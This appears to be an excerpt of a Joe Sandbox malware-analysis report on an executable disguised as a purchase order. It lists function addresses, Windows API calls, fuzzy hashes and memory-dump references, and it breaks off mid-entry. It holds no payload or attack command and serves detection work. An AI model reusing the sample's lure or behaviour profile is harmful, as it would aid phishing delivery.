                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                  • String ID:
                                  • API String ID: 3632110297-0
                                  • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                  • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                  • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                  • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                  Function 00455168 Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Destroy$DeleteMenuObject$74285Cursor
                                  • String ID:
                                  • API String ID: 3561812883-0
                                  • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                  • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                  • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                  • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                  Function 004552FA Relevance: 9.1, APIs: 6, Instructions: 72COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: 74285DeleteObject$A0860CursorDestroy
                                  • String ID:
                                  • API String ID: 1806040871-0
                                  • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                  • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                  • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                  • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                  Function 004556C8 Relevance: 9.1, APIs: 6, Instructions: 67COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: 74285DeleteObject$A0860CursorDestroy
                                  • String ID:
                                  • API String ID: 1806040871-0
                                  • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                  • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                  • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                  • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                  Function 004331A2 Relevance: 9.1, APIs: 6, Instructions: 64sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                  • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                  • String ID:
                                  • API String ID: 2833360925-0
                                  • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                  • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                  • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                  • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                  Function 004555A8 Relevance: 9.1, APIs: 6, Instructions: 61windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendMessageW.USER32 ref: 004555C7
                                  • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                  • DeleteObject.GDI32(?), ref: 00455736
                                  • DeleteObject.GDI32(?), ref: 00455744
                                  • DestroyCursor.USER32(?), ref: 00455752
                                  • 74285CF0.USER32(?), ref: 00455760
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: DeleteMessageObjectSend$74285CursorDestroy
                                  • String ID:
                                  • API String ID: 2906226244-0
                                  • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                  • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                                  • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                  • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                                  Function 00447275 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                    • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                    • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                  • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                  • LineTo.GDI32(?,?,?), ref: 004472AC
                                  • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                  • LineTo.GDI32(?,?,?), ref: 004472C6
                                  • EndPath.GDI32(?), ref: 004472D6
                                  • StrokePath.GDI32(?), ref: 004472E4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                  • String ID:
                                  • API String ID: 372113273-0
                                  • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                  • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                  • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                  • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                  Function 0044CC51 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                  Download Yara Rule
                                  APIs
                                  • 7427A570.USER32(00000000), ref: 0044CC6D
                                  • 74284620.GDI32(00000000,00000058), ref: 0044CC78
                                  • 74284620.GDI32(00000000,0000005A), ref: 0044CC84
                                  • 7427A480.USER32(00000000,00000000), ref: 0044CC90
                                  • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                  • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: 742774284620$A480A570
                                  • String ID:
                                  • API String ID: 4022277249-0
                                  • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                  • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                  • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                  • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                  Function 00417082 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • __getptd.LIBCMT ref: 0041708E
                                    • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                    • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                  • __amsg_exit.LIBCMT ref: 004170AE
                                  • __lock.LIBCMT ref: 004170BE
                                  • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                  • _free.LIBCMT ref: 004170EE
                                  • InterlockedIncrement.KERNEL32(019E17F0), ref: 00417106
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                  • String ID:
                                  • API String ID: 3470314060-0
                                  • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                  • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                  • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                  • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                  Function 0044B63B Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                  • RtlEnterCriticalSection.KERNEL32(?), ref: 0044B666
                                  • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                    • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                  • RtlLeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                  • String ID:
                                  • API String ID: 3495660284-0
                                  • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                  • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                  • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                  • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                  Function 00410AB0 Relevance: 9.0, APIs: 6, Instructions: 40keyboardCOMMON
                                  Download Yara Rule
                                  APIs
                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Virtual
                                  • String ID:
                                  • API String ID: 4278518827-0
                                  • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                  • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                  • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                  • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                  Function 004151AF Relevance: 9.0, APIs: 6, Instructions: 33threadCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                  • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                    • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                    • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                  • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                    • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                  • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                  • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                  • RtlExitUserThread.KERNEL32(00000000), ref: 004151ED
                                  • __freefls@4.LIBCMT ref: 00415209
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Value$ErrorExitLastThreadUser___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                  • String ID:
                                  • API String ID: 3590604804-0
                                  • Opcode ID: 9accb2c970c3ad42c36fa16d08c3c3a8e1e2ab1c4653ce7caab8e07ca954b280
                                  • Instruction ID: 33dbf055cdb8ff64cef25b7eefd28ade4c14083f8bd1581388e3e252127bbc8b
                                  • Opcode Fuzzy Hash: 9accb2c970c3ad42c36fa16d08c3c3a8e1e2ab1c4653ce7caab8e07ca954b280
                                  • Instruction Fuzzy Hash: B3F03675904705AFC704BFB2C9498CE7B75AF84349720845EB90847222DA3CD8C2CA59
                                  Function 004151BB Relevance: 9.0, APIs: 6, Instructions: 29threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                    • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                    • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                  • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                    • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                  • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                  • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                  • RtlExitUserThread.KERNEL32(00000000), ref: 004151ED
                                  • __freefls@4.LIBCMT ref: 00415209
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Value$ErrorExitLastThreadUser___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                  • String ID:
                                  • API String ID: 3516609193-0
                                  • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                  • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                  • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                  • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                  Function 0045F790 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 216windowCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                    • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                  • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                  • _wcslen.LIBCMT ref: 0045F94A
                                  • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                  • String ID: 0
                                  • API String ID: 621800784-4108050209
                                  • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                  • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                  • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                  • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                  Function 00478172 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 176COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
